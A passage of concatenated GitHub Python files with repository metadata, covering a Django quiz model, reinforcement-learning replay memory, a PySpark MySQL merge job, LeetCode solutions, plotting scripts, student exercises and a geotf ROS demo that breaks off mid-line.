option_2 = models.CharField(max_length=200)\n option_3 = models.CharField(max_length=200)\n option_4 = models.CharField(max_length=200)\n correct_ans = models.CharField(max_length=200)\n\nclass Result(models.Model):\n student = models.ForeignKey(CustomUser,on_delete=models.CASCADE, related_name=\"all_results\")\n quiz = models.ForeignKey(Quiz,on_delete=models.CASCADE, related_name=\"quiz_results\")\n correct_answers_count = models.IntegerField(default=0,null=True,blank=True)\n wrong_answers_count = models.IntegerField(default=0,null=True,blank=True)\n not_answered_count = models.IntegerField(default=0,null=True,blank=True)\n\nclass Answer(models.Model):\n result = models.ForeignKey(Result,on_delete=models.CASCADE, related_name=\"answers\")\n question = models.ForeignKey(Question,on_delete=models.CASCADE, related_name=\"all_answers\", blank=True, null=True)\n given_ans = models.CharField(max_length=200)\n","repo_name":"kushagr-Nandan/smilebots-assessment","sub_path":"smilebot/quizing/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"25019120989","text":"import PythonFileLibrary.SettingParser\n\n\"\"\"\n SettingParser.py\n\n Parses setup.txt for library name, the directory of the files you want to scan, and\n the output directory of BuiltInVariables.txt.\n\"\"\"\nclass SettingParser(PythonFileLibrary.SettingParser.SettingParser):\n def __init__(self):\n super().__init__()\n self.libraryName = \"\"\n self.libraryDirectory = \"\"\n self.outputDirectory = \"\"\n\n try:\n self.Parse()\n except AssertionError as error:\n print(error)\n\n # Parse setup.txt. Will throw an AssertionError if the\n # file cannot be read.\n def Parse(self):\n assert self.canParse, \"SettingParser.py: Could not parse setup.txt.\"\n\n currentSetting = 0\n for line in self.GetSettings():\n currentSetting += 1\n\n if currentSetting == 1:\n self.libraryName = self.GetNextLine().strip()\n\n if currentSetting == 2:\n self.libraryDirectory = self.GetNextLine().strip()\n\n if currentSetting == 3:\n self.outputDirectory = self.GetNextLine().strip()\n\n self.ResetReader()\n","repo_name":"jghsrobotics/RobotCDocs","sub_path":"RobotCDocs/SettingParser.py","file_name":"SettingParser.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19508779775","text":"def FindClumps(text, k, L, t):\r\n '''\r\n A function to find clumps of k-mer in specific window within Genome to shed light \r\n on the location of Ori\r\n INPUT:\r\n text - the genome as string\r\n k - the length of k-mer we're looking for\r\n L - the length of the window\r\n t - the window must have at least t-number of k-mer repetition to be considered\r\n OUTPUT:\r\n patterns - a list of possible k-mers\r\n\r\n '''\r\n patterns =[]\r\n length = len(text)\r\n # scanning the genome by window length\r\n for sub_text in range(0,length-L):\r\n window = text[sub_text:sub_text+L]\r\n freqMap = FrequencyTable(window, k)\r\n for pattern in freqMap.keys():\r\n if freqMap[pattern] >= t:\r\n patterns.append(pattern)\r\n # remove dublications\r\n patterns = list(set(patterns))\r\n return patterns","repo_name":"EsraaK-009/DNA_hidden_messages","sub_path":"Find_clumps.py","file_name":"Find_clumps.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28777397997","text":"# Import the necessary modules\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\n# Initialize the lists for X and Y\nmediumCSTree = pd.read_csv('./dataForPlots/TreeDepth.csv')\ndfMT = pd.DataFrame(mediumCSTree)\n\n# ax = plt.subplot(3,2,3, figsize=(15, 15))\nplt.plot(dfMT['Domlock'], color='#ed553b', label='Domlock', marker='d')\nplt.plot(dfMT['Intention Lock'], color='#f6d55c', label='Intention Lock', marker='s')\nplt.plot(dfMT['CALock'], color='#173f5f', label='CALock', marker='+')\nplt.xticks([0, 1, 2, 3, 4, 5, 6, 7], ['9', '10', '11', '12', '13', '14', '15', '16'])\nplt.xlabel(\"Depth of hierarchy\")\nplt.ylabel(\"Execution time(Log Scale)\")\nplt.legend()\n\nplt.savefig('./DepthOfTree.png')\n","repo_name":"ayushpandey8439/CALockBench","sub_path":"StressTest/DepthTree.py","file_name":"DepthTree.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35592714753","text":"import argparse\nimport copy\nfrom collections import namedtuple\nfrom typing import List\n\nimport numpy as np\n\nfrom utilities.segment_tree import SumSegmentTree\n\n# Definition of observation:\n# state: s_t\n# action: a_t\n# reward: r_(t+1) (reward received due to being at state s_t and performing action a_t which transitions to state\n# s_(t+1))\n# terminal: t_(t+1) (whether or not the next state is a terminal state)\nslim_observation = namedtuple('slim_observation', 'state, action, reward, terminal, valid_observation, success')\nobservation = namedtuple('observation', 'state, action, reward, terminal, next_state, index_in_memory')\n\n\nclass ReplayMemory(object):\n def __init__(self, params: argparse) -> None:\n self.params = params\n self.memory_size = params.replay_memory_size\n self.success_memory_size = int(self.memory_size * 0.1) # 10% of the size of the main memory.\n self.batch_size = params.batch_size\n self.hist_len = params.hist_len\n self.memory: List[slim_observation] = [None for _ in range(self.memory_size)]\n self.success_memory: List[slim_observation] = None\n self.elements_in_memory = 0\n self.insert_index = 0\n self.step = 0\n\n # Success memory will only contain trajectories which lead to a successful finish of the task.\n if self.params.success_replay_memory:\n self.success_memory: List[slim_observation] = [None for _ in range(self.success_memory_size)]\n self.maximal_success_trajectory = 10 # For trajectories longer, we will keep only the last X steps.\n self.elements_in_success_memory = 0\n self.success_insert_index = 0\n\n # Prioritized ER parameters.\n if self.params.prioritized_experience_replay:\n self.epsilon = 0.01\n self.alpha = 0.6\n it_capacity = 1\n while it_capacity < self.memory_size:\n it_capacity *= 2\n self._it_sum = SumSegmentTree(it_capacity)\n self._max_priority = 1.0\n\n def add_observation(self, state: object, action: int, reward: float, terminal: int,\n valid_observation: bool, success: bool) -> None:\n self.memory[self.insert_index] = slim_observation(state=state, action=action, reward=reward, terminal=terminal,\n valid_observation=valid_observation,\n success=success)\n\n if self.params.prioritized_experience_replay:\n # Update values in Sum and Min trees (Prioritized ER). To ensure all observations are sampled at least once,\n # they are initially set to maximal priority.\n priority = (self._max_priority + self.epsilon) ** self.alpha\n if self.insert_index < self.params.hist_len:\n # We want to make sure that the minimal sampled index will be hist_len to ensure we can build a full\n # state.\n priority = 0.0\n self._it_sum[self.insert_index] = priority\n\n if success and self.params.success_replay_memory:\n # Find trajectory start index\n trajectory_length = 0\n while trajectory_length < self.maximal_success_trajectory and \\\n (self.insert_index - trajectory_length) > 0 and \\\n self.memory[self.insert_index - trajectory_length - 1].terminal != 1:\n trajectory_length += 1\n\n for idx in reversed(range(trajectory_length)):\n self.success_memory[self.success_insert_index] = copy.deepcopy(self.memory[self.insert_index - idx])\n self.elements_in_success_memory = min(self.elements_in_success_memory + 1, self.success_memory_size)\n self.success_insert_index = (self.success_insert_index + 1) % self.success_memory_size\n\n self.elements_in_memory = min(self.elements_in_memory + 1, self.memory_size)\n self.insert_index = (self.insert_index + 1) % self.memory_size\n\n def _sample_proportional(self, batch_size) -> List[int]:\n res = []\n for _ in range(batch_size):\n mass = np.random.random() * self._it_sum.sum(0, self.elements_in_memory - 1)\n idx = self._it_sum.find_prefixsum_idx(mass)\n res.append(idx)\n return res\n\n def sample(self):\n # Returns: Tuple[states, actions, rewards, termination values, next states, indices]\n mini_batch = []\n self.step += 1\n\n if self.params.prioritized_experience_replay:\n training_samples = self._sample_proportional(self.batch_size)\n else:\n training_samples = np.random.randint(low=(self.params.hist_len - 1), high=(self.elements_in_memory - 1),\n size=self.batch_size)\n for index in range(self.batch_size):\n\n # Calculate probability of sampling from success replay memory.\n if self.params.srm_decay == 0:\n success_sample_probability = self.params.srm_end\n else:\n success_sample_probability = self.params.srm_start * (1 - min(1, self.step * 1.0 /\n self.params.srm_decay)) \\\n + self.params.srm_end * min(1, self.step * 1.0 / self.params.srm_decay)\n\n if not self.params.success_replay_memory or np.random.rand() > success_sample_probability or \\\n self.elements_in_success_memory < self.params.hist_len:\n memory = self.memory\n\n while not memory[training_samples[index]].valid_observation or \\\n training_samples[index] < self.params.hist_len:\n # Invalid observations are for instance states in which we terminate due to timeout.\n # We do not learn from termination states due to timeout. Timeout is an artificial addition to make\n # sure episodes end and the train/test procedure continues.\n # Also make sure all samples are in the range [self.params.hist_len, self.elements_in_memory - 1]\n # to ensure that we can always build the first state and the next state.\n if self.params.prioritized_experience_replay:\n training_samples[index] = self._sample_proportional(1)[0]\n else:\n training_samples[index] = np.random.randint(low=(self.params.hist_len - 1),\n high=(self.elements_in_memory - 1), size=1)\n\n sample_index = training_samples[index]\n else:\n memory = self.success_memory\n training_samples[index] = -1\n sample_index = np.random.randint(low=(self.params.hist_len - 1),\n high=(self.elements_in_success_memory - 1))\n while not memory[sample_index].valid_observation:\n sample_index = np.random.randint(low=(self.params.hist_len - 1),\n high=(self.elements_in_success_memory - 1))\n\n obs = memory[sample_index]\n state = self._build_state(sample_index, memory)\n if obs.terminal != 1: # 1 means True.\n next_state = self._build_state(sample_index + 1, memory)\n else:\n # Instead of trying to infer state size, just return a state. The terminal flag denotes to disregard\n # this 'next_state' object.\n next_state = state\n\n mini_batch.append(observation(state=state, action=obs.action, reward=obs.reward, terminal=obs.terminal,\n next_state=next_state, index_in_memory=training_samples[index]))\n\n return zip(*mini_batch)\n\n def _build_state(self, final_index: int, memory) -> np.ndarray:\n state = []\n # Final observation should be added prior to the loop, to ensure proper state buildup.\n state.insert(0, memory[final_index].state)\n saw_terminal = False\n for i in range(1, self.params.hist_len):\n # Once we encounter a terminal state, this means we are wrapping around to a previous trajectory.\n # States are start-zero-padded given they are the start of the trajectory.\n if memory[final_index - i].terminal:\n saw_terminal = True\n\n if saw_terminal:\n state.insert(0, np.zeros_like(memory[final_index].state))\n else:\n state.insert(0, memory[final_index - i].state)\n\n return np.array(state)\n\n def update_priorities(self, indices: List[int], priorities: List[float]) -> None:\n assert len(indices) == len(priorities)\n for idx, priority in zip(indices, priorities):\n if idx >= 0: # idx = -1 means sampled from the success ER.\n assert priority >= 0\n assert 0 <= idx < self.elements_in_memory\n self._it_sum[self.insert_index] = (priority + self.epsilon) ** self.alpha\n\n self._max_priority = max(self._max_priority, priority)\n\n def size(self) -> int:\n return self.elements_in_memory\n\n\nclass ParallelReplayMemory(ReplayMemory):\n \"\"\"\n Parallel replay memory stores a running trajectory of observations for each running agent.\n Once the agent has finished, it will inject the trajectory into the shared replay memory.\n \"\"\"\n def __init__(self, params: argparse) -> None:\n super(ParallelReplayMemory, self).__init__(params)\n\n self.agents_observations: List[List[slim_observation]] = None\n self._reset_agents_observations()\n\n def _reset_agents_observations(self):\n self.agents_observations = [[] for _ in range(self.params.number_of_agents)]\n\n def add_observation(self, state, action: List[int], reward: List[float], terminal: List[bool],\n valid_observation: List[bool], success: List[bool]) -> None:\n agents_still_playing = False\n for idx, r in enumerate(reward):\n if r is not None and terminal[idx] is not None:\n if not terminal[idx]:\n agents_still_playing = True\n self.agents_observations[idx].append(\n slim_observation(state=state[idx], action=action[idx], reward=reward[idx],\n terminal=int(terminal[idx]), valid_observation=valid_observation[idx],\n success=success[idx]))\n\n # Once all agents have finished playing, insert all trajectories one after the other into the replay memory.\n # This behavior keeps our observations synced properly whilst allowing for multiple instances at once.\n if not agents_still_playing:\n for agent_idx in range(self.params.number_of_agents):\n for _slim_observation in self.agents_observations[agent_idx]:\n super(ParallelReplayMemory, self).add_observation(_slim_observation.state, _slim_observation.action,\n _slim_observation.reward,\n _slim_observation.terminal,\n _slim_observation.valid_observation,\n _slim_observation.success)\n self._reset_agents_observations()\n","repo_name":"tesslerc/malmo_rl","sub_path":"utilities/replay_memory.py","file_name":"replay_memory.py","file_ext":"py","file_size_in_byte":11701,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"6905363123","text":"# -*- coding: utf-8 -*-\n\n\n\"\"\"\n\n在192.168.37.28 bigdata8上执行\n将数据按照年合并\n报错:\npy4j.protocol.Py4JJavaError: An error occurred while calling o361.jdbc. : scala.MatchError: null\n\n1. pyspark 写入MySQL报错 An error occurred while calling o45.jdbc.: scala.MatchError: null 解决方案\nhttps://blog.csdn.net/helloxiaozhe/article/details/81033767\n\n时间:2019年7月3日\n在bigdata7上提交任务:\n\nnohup spark-submit --master yarn /root/lulu/Workspace/swt/Merge_Data_linux.py &\n\n查看任务执行状态\nyarn application -list\n\nspark-submit --master yarn --deploy-mode client --num-executors 10 --executors-cores 2 mnistOnSpark.py\n\nnohup spark-submit --master yarn --deploy-mode client --num-executors 6 --executor-cores 2 --executor-memory 4g /root/lulu/Workspace/swt/Merge_Data_linux.py &\n\n\n\"\"\"\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import *\n\n\nspark = SparkSession\\\n .builder\\\n .appName(\"merge data\")\\\n .getOrCreate()\n\nds_tables = spark.read.format('jdbc').\\\n options(url='jdbc:mysql://10.20.5.49:3306/',\n dbtable='information_schema.tables',\n user='root',\n password='BigData@2018',\n driver='com.mysql.jdbc.Driver').\\\n load().\\\n filter(\"table_schema = 'swt_tradewar'\").\\\n select(\"TABLE_NAME\").filter(col(\"TABLE_NAME\").startswith(\"b_data_\"))\n\nlist_tables = list(ds_tables.rdd.map(lambda x:x.TABLE_NAME).collect())\n\n# list_tables = filter(lambda x:str(x).startswith(\"b_data_2017\"),list_tables)\n\nurl = \"jdbc:mysql://10.20.5.49:3306/swt_tradewar?useUnicode=true&characterEncoding=UTF-8&user=root&password=BigData@2018\"\n\nds_company_code = spark.read.jdbc(url=url,table=\"ut_company_code\").select(\"CODE\",\"NAME\").withColumnRenamed(\"NAME\",\"COMPANYNAME\")\nds_consign_code = spark.read.jdbc(url=url,table=\"ut_consign_code\").select(\"CODE\",\"NAME\").withColumnRenamed(\"NAME\",\"CONSIGN\")\nds_country_code = spark.read.jdbc(url=url,table=\"ut_country_code\").select(\"CODE\",\"NAME\").withColumnRenamed(\"NAME\",\"COUNTRY\")\nds_cust_code = spark.read.jdbc(url=url,table=\"ut_cust_code\").select(\"CODE\",\"NAME\").withColumnRenamed(\"NAME\",\"CUST\")\nds_hs_code = spark.read.jdbc(url=url,table=\"ut_hs_code\").select(\"CODE\",\"NAME\").withColumnRenamed(\"NAME\",\"COMMODITIES\")\nds_trade_code = spark.read.jdbc(url=url,table=\"ut_trade_code\").select(\"CODE\",\"NAME\").withColumnRenamed(\"NAME\",\"TRADE\")\nds_transport_code = spark.read.jdbc(url=url,table=\"ut_transport_code\").select(\"CODE\",\"NAME\").withColumnRenamed(\"NAME\",\"TRANSPORT\")\n\n# 企业名、主要商品、计量单位、货源地(出口)/境内目的地(进口)、贸易方式、国别、进出口关区、运输方式、当月数量、累计数量、当月美元、累计美元、当月rmb、累计rmb\ncol_name = [\"COMPANYNAME\", \"COMMODITIES\", \"UNITCODE\", \"CONSIGN\", \"TRADE\", \"COUNTRY\", \"CUST\", \"TRANSPORT\", \"QUNT\",\n \"SUMQ\", \"USD\", \"SUMM\", \"RMB\", \"RMBSUMM\",\n \"COMPANYCODE\",\"HSCODE\",\"CONSIGNCODE\",\"TRADECODE\",\"COUNTRYCODE\",\"CUSTCODE\",\"TRANSPORTCODE\"]\n\nfor db_table in list_tables:\n print(db_table+\" start!\")\n type = str(db_table).split(\"_\")[3]\n time = str(db_table).split(\"_\")[2]\n year = str(time[0:4])\n month = str(time[4:6])\n ds = spark.read.jdbc(url=url, table=db_table)\n ds1 = ds.join(ds_company_code, ds.COMPANYCODE == ds_company_code.CODE, \"inner\").drop(\"CODE\")#.drop(\"COMPANYCODE\")\n ds2 = ds1.join(ds_hs_code, ds1.HSCODE == ds_hs_code.CODE, \"inner\").drop(\"CODE\")#.drop(\"HSCODE\")\n ds3 = ds2.join(ds_consign_code, ds2.CONSIGNCODE == ds_consign_code.CODE, \"inner\").drop(\"CODE\")#.drop(\"CONSIGNCODE\")\n ds4 = ds3.join(ds_trade_code, ds3.TRADECODE == ds_trade_code.CODE, \"inner\").drop(\"CODE\")#.drop(\"TRADECODE\")\n ds5 = ds4.join(ds_country_code, ds4.COUNTRYCODE == ds_country_code.CODE, \"inner\").drop(\"CODE\")#.drop(\"COUNTRYCODE\")\n ds6 = ds5.join(ds_cust_code, ds5.CUSTCODE == ds_cust_code.CODE, \"inner\").drop(\"CODE\")#.drop(\"CUSTCODE\")\n ds7 = ds6.join(ds_transport_code, ds6.TRANSPORTCODE == ds_transport_code.CODE, \"inner\").drop(\"CODE\")#.drop(\"TRANSPORTCODE\")\n ds8 = ds7.select(col_name).withColumn(\"TIME\", lit(time)).withColumn(\"YEAR\", lit(year)).withColumn(\"MONTH\", lit(month))\n if type == \"e\":\n # ds8.coalesce(25).write.mode(\"append\").jdbc(url=url, table=\"data_export\") # 在bigdata8运行出错代码\n ds8.coalesce(25).write.jdbc(mode=\"append\", url=url,table=\"data_export\", properties={\"driver\": 'com.mysql.jdbc.Driver'})\n # ds8.coalesce(15).write.jdbc(mode=\"append\", url=url,table=\"data_export_\" + year, properties={\"driver\": 'com.mysql.jdbc.Driver'})\n print(db_table + \" finish!\")\n if type == \"i\":\n # ds8.coalesce(25).write.mode(\"append\").jdbc(url=url, table=\"data_import\") # 在bigdata8运行出错代码\n ds8.coalesce(25).write.jdbc(mode=\"append\", url=url,table=\"data_import\", properties={\"driver\": 'com.mysql.jdbc.Driver'})\n # ds8.coalesce(15).write.jdbc(mode=\"append\", url=url,table=\"data_import_\" + year, properties={\"driver\": 'com.mysql.jdbc.Driver'})\n print(db_table + \" finish!\")\n\n\n\nspark.stop()","repo_name":"sunshinelu/PythonDiary","sub_path":"Project/SWT/TradeWar/Merge_Data_linux.py","file_name":"Merge_Data_linux.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"914318816","text":"'''\r\n汇总区间,给定一个无重复元素的有序整数数组,给出一些个区间刚好覆盖连续的元素\r\n\r\n思路:\r\n依次遍历即可\r\n输入:nums = [0,1,2,4,5,7]\r\n输出:[\"0->2\",\"4->5\",\"7\"]\r\n'''\r\n\r\ndef summaryRanges(nums):\r\n # 看清题目中是否说的是非空数组,否则要先进行判断,防止超出下标\r\n l = len(nums)\r\n if l == 0:\r\n return []\r\n\r\n first_ele = nums[0]\r\n ss = []\r\n for i in range(1, l):\r\n if nums[i] - nums[i-1] > 1:\r\n if first_ele == nums[i-1] or first_ele == nums[i]: # 第一个元素是单个区间或者最后一个元素是单个区间的情况\r\n s = str(nums[i-1])\r\n else:\r\n s = str(first_ele) + '->' + str(nums[i-1])\r\n ss.append(s)\r\n first_ele = nums[i]\r\n # 处理最后几个元素\r\n if nums[l-1] != first_ele:\r\n s = str(first_ele) + '->' + str(nums[l-1])\r\n else:\r\n s = str(nums[l-1])\r\n ss.append(s)\r\n return ss\r\n\r\nnums = []\r\nprint(summaryRanges(nums))","repo_name":"zhang-yujie/Leetcode_record","sub_path":"Array/Seventh_day/Q228.py","file_name":"Q228.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"70078650078","text":"\"\"\"\nGiven an n-ary tree, return the level order traversal of its nodes' values. (ie, from left to right, level by level).\n\nFor example, given a 3-ary tree:\n\nWe should return its level order traversal:\n\n[\n [1],\n [3,2,4],\n [5,6]\n]\n\n\"\"\"\n\n\n# # Definition for a Node.\n# class Node:\n# def __init__(self, val, children):\n# self.val = val\n# self.children = children\n\n\n\"\"\"\nTime Complexity: O(n)\nSpace Complexity: O(n)\n\"\"\"\n\n\nfrom collections import deque\n\n\nclass Solution:\n def levelOrder(self, root: 'Node') -> List[List[int]]:\n if root is None:\n return []\n\n q = deque([root])\n results = []\n while q:\n results.append([item.val for item in q])\n len_q = len(q)\n for _ in range(len_q):\n node = q.popleft()\n for child in node.children:\n q.append(child)\n\n return results\n","repo_name":"hz336/Algorithm","sub_path":"LeetCode/BFS/E N-ary Tree Level Order Traversal.py","file_name":"E N-ary Tree Level Order Traversal.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"21728347068","text":"import matplotlib.pyplot as plt\nimport matplotlib.style as style\nimport io\nimport base64\nimport numpy as np\n\n\ndef build_graph(source, avgscore):\n style.use('fivethirtyeight')\n plt.locator_params(integer=True)\n img = io.BytesIO()\n plt.tight_layout()\n plt.bar(source, avgscore, color='m')\n plt.xlabel('Source')\n plt.ylabel('Average Score Given')\n plt.title(\"Average Score Given per Source\")\n plt.tight_layout()\n plt.ylim((0, 10))\n plt.savefig(img, format='png')\n img.seek(0)\n graph_url = base64.b64encode(img.getvalue()).decode()\n plt.close()\n return 'data:image/png;base64,{}'.format(graph_url)\n","repo_name":"leestanley/Sachacks-2018-rebias","sub_path":"plottest/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"24669593428","text":"import datetime\n\ndef get_members():\n members = [[543, 'Eve', '1989-06-26'], [544, 'Alice', '1990-03-26'], [545, 'Bob','2001-09-15'], [546, 'Charlie', '1985-10-22'], [545, 'Ivan', '1987-04-09'], [546, 'Gerth', '1990-08-14'], [543, 'Leo', '1993-09-3'], [544, 'Hudson', '1984-11-08'], [545, 'Dylan', '1983-05-13'], [546, 'Ezra', '1992-01-27'], [545, 'Thomas', '1987-07-19'], [546, 'Charles', '1989-12-16'],[545, 'Maverick', '2003-02-25'], [546, 'Elias','1987-04-25']]\n return members\n\ndef sort_members(members):\n return sorted(members, key=lambda x: x[2])\n\ndef get_enterprise(members):\n days=[]\n date=[]\n for i in range(len(members)):\n days.append(datetime.datetime.strptime(members[i][2], '%Y-%m-%d').day)\n for i in range(len(days)):\n if days[i] > 1:\n for j in range(2,days[i]):\n if (days[i] % j) == 0:\n days[i] = False\n break\n for k in range(len(members)):\n if days[k] != False:\n date.append(members[k])\n return date\n\ndef get_managers(members):\n bday=[]\n name=[]\n final=[]\n for i in range(len(members)):\n bday.append(datetime.datetime.strptime(members[i][2], '%Y-%m-%d').day)\n name.append(members[i][1])\n for i in range(len(members)):\n if len(name[i]) <= 6:\n name[i] = False\n if (members[i][0]%2 == 0 or bday[i]%2 != 0):\n bday[i] = False\n for k in range(len(members)):\n if (name[k] != False or bday[k] != False):\n final.append(members[k])\n return final\n\nif __name__ == \"__main__\":\n members = get_members()\n membersSorted = sort_members(members)\n print(membersSorted)\n enterprise = get_enterprise(membersSorted)\n print(enterprise)\n managers = get_managers(membersSorted)\n print(managers)","repo_name":"avrilalphonse/Ametros-Learning","sub_path":"meetingWithPolina.py","file_name":"meetingWithPolina.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24965278222","text":"import numpy as np\nimport torch\nfrom utils import FileWriter\nfrom collections.abc import Iterable\n\n\nclass MeasureCollector:\n def __init__(self, measures, similarities, number_of_layers, path):\n self._determine_all_measures(measures, similarities, number_of_layers)\n self.file = FileWriter(path, \",\".join(self.measure_headers))\n\n self.current_id = -1\n self.results = []\n\n\n def _determine_all_measures(self, measures, similarities, number_of_layers):\n # Determine network similarity measures\n sim_measures = [*filter(lambda x: 'sim' in x, measures)]\n non_sim_measures = [*filter(lambda x: 'sim' not in x, measures)]\n\n for i, measure in enumerate(sim_measures):\n sim_measures[i] = [*map(lambda sim: f'{measure}_{sim}', similarities)]\n\n sim_measures = np.ravel(sim_measures)\n \n self.measures = [*non_sim_measures, *sim_measures]\n\n # Determine per_layer similarity measures\n sim_pl_measures = [*filter(lambda x: 'sim_pl' in x, self.measures)]\n non_sim_pl_measures = [*filter(lambda x: 'sim_pl' not in x, self.measures)]\n\n for i, measure in enumerate(sim_pl_measures):\n sim_pl_measures[i] = [*map(lambda layer_idx: f'{measure}_{layer_idx}', range(number_of_layers))]\n\n sim_pl_measures = np.ravel(sim_pl_measures)\n \n self.measure_headers = [*non_sim_pl_measures, *sim_pl_measures]\n\n # Determine std's and means for number sets\n at_measures = [*filter(lambda x: '@' in x, self.measure_headers)]\n non_at_measures = [*filter(lambda x: '@' not in x, self.measure_headers)]\n\n for i, measure in enumerate(at_measures):\n at_measures[i] = [*map(lambda op: f'{measure}_{op}', ['mean','std'])]\n\n at_measures = np.ravel(at_measures)\n\n self.measure_headers = [*non_at_measures, *at_measures]\n\n\n def next(self):\n self.current_id += 1\n\n if self.current_id >= len(self.measures):\n self.current_id = -1\n return None\n\n return self.measures[self.current_id]\n \n\n def add(self, data):\n if type(data) == dict:\n for value in data.values():\n if isinstance(value, torch.Tensor): value = value.numpy()\n self.results.append(np.mean(value))\n self.results.append(np.std(value))\n elif isinstance(data, Iterable):\n if isinstance(data, torch.Tensor): data = data.numpy()\n self.results.append(np.mean(data))\n self.results.append(np.std(data))\n else:\n self.results.append(data)\n\n\n def write(self):\n for i, result in enumerate(self.results): self.results[i] = str(result)\n\n self.file(\",\".join(self.results))\n self.results = []\n\n","repo_name":"peterddod/masters-experiment-software","sub_path":"src/MeasureCollector.py","file_name":"MeasureCollector.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36046714329","text":"#3.7\r\na = int(input('Введите значение: '))\r\nb = int(input('Введите значение: '))\r\nc = int(input('Введите значение: '))\r\nprint(a+b)\r\nif (a+b)>c and (b+c)>a and (c+a)>b:\r\n print('Yes')\r\nelse: print('No')\r\n\r\n#3.8\r\nmyyear=int(input('Введите год: '))\r\nif ((myyear%4==0) and (myyear%100!=0)) or (myyear%400==0):\r\n print(\"Високосный\")\r\nelse: print(\"Обычный\")\r\n\r\n#3.10\r\nstr1 = input(\"Введите номер: \")\r\nif len(str1)%2:\r\n print(\"No\")\r\nif len(str1)==2:\r\n if int(str1[0])==int(str1[1]):\r\n print(\"Yes\")\r\n else: print(\"No\")\r\nif len(str1)==4:\r\n if (int(str1[0])+int(str1[1]))==(int(str1[2])+int(str1[3])):\r\n print(\"Yes\")\r\n else: print(\"No\")\r\nif len(str1)==6:\r\n if (int(str1[0])+int(str1[1])+int(str1[2]))==(int(str1[3])+int(str1[4])+int(str1[5])):\r\n print(\"Yes\")\r\n else: print (\"No\")\r\n\r\n#4.1\r\nm = '''1. Введение в Python\r\n2. Строки и списки\r\n3. Условные операторы\r\n4. Циклы\r\n5. Словари, кортежи и множества\r\n6. Выход'''\r\nchunks = m.split('\\n')\r\na = int(input(\"Введите номер: \"))\r\nif (int(chunks.index(chunks[0])) + 1) == a:\r\n print(chunks[0])\r\nelif (int(chunks.index(chunks[1])) + 1) == a:\r\n print(chunks[1])\r\nelif (int(chunks.index(chunks[2])) + 1) == a:\r\n print(chunks[2])\r\nelif (int(chunks.index(chunks[3])) + 1) == a:\r\n print(chunks[3])\r\nelif (int(chunks.index(chunks[4])) + 1) == a:\r\n print(chunks[4])\r\nelif (int(chunks.index(chunks[5])) + 1) == a:\r\n print(chunks[5])\r\n","repo_name":"mbln3000/1SemHW","sub_path":"task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24812892417","text":"#!/usr/bin/env python\n\nimport geotf\nimport roscpp_initializer\nimport time\nimport numpy as np\nimport rospy\n\n\"\"\" \n Example of how to use geotf (copied from geotf Cpp library)\n - Lunch using demo_python.launch\n \n\n Read frame configuration from rosparams.\n Configred Geo frames in that launch file:\n - ENU_LEE: Enu frame with origin on the LEE terasse at ETH\n - GPS: WGS84 GPS frame (so x=lon, y = lat, z = alt)\n - UTM: UTM 32 North frame (x = easting, y = northing, z = altitude)\n - CH1903+: Swissgrid based on new CH1903+ coordinates and Landesvermessung 95.\n\"\"\"\n\nif __name__ == \"__main__\":\n\n rospy.init_node(\"geotf_python_demo\")\n\n converter = geotf.GeodeticConverter()\n # Call roscpp init to use ROS related functions through bindings\n roscpp_initializer.roscpp_init(\"roscpp_geotf_python_demo\", [])\n # Add frames manually because ros related functions don't work through bindings atm\n converter.initFromRosParam()\n\n # Wait for TF to setup\n time.sleep(1.0)\n\n # Initialize ETH mainbuilding based on UTM coordiantes for example.\n eth_mainbuilding_utm = np.array([465882.064, 5247094.385, 498.217])\n\n # Output ETH mainbuilding in GPS frame\n if converter.canConvert(\"UTM\", \"GPS\"):\n # Python does not support pointers, therefore python wrapper for\n # convert only takes 3 arguments and returns the output\n eth_mainbuilding_gps = converter.convert(\"UTM\", eth_mainbuilding_utm, \"GPS\")\n\n rospy.loginfo(\n \"ETH Mainbuilding WGS84 = %s\",\n np.array2string(eth_mainbuilding_gps, precision=15),\n )\n else:\n rospy.logwarn(\"Frames not loaded.\")\n\n # Output ETH mainbuilding in Swissgrid frame\n if converter.canConvert(\"UTM\", \"CH1903+\"):\n eth_mainbuilding_ch = converter.convert(\"UTM\", eth_mainbuilding_utm, \"CH1903+\")\n\n rospy.loginfo(\n \"ETH Mainbuilding CH1903+/LV95 = %s\",\n np.array2string(eth_mainbuilding_ch, precision=9),\n )\n else:\n rospy.logwarn(\"Frames not loaded.\")\n\n # Output ETH mainbuilding in ENU frame based on LEE terasse\n if converter.canConvert(\"UTM\", \"ENU_LEE\"):\n eth_mainbuilding_enu = converter.convert(\"UTM\", eth_mainbuilding_utm, \"ENU_LEE\")\n\n rospy.loginfo(\n \"ETH Mainbuilding in ENU Frame based on LEE Terasse = %s\",\n np.array2string(eth_mainbuilding_enu, precision=15),\n )\n else:\n 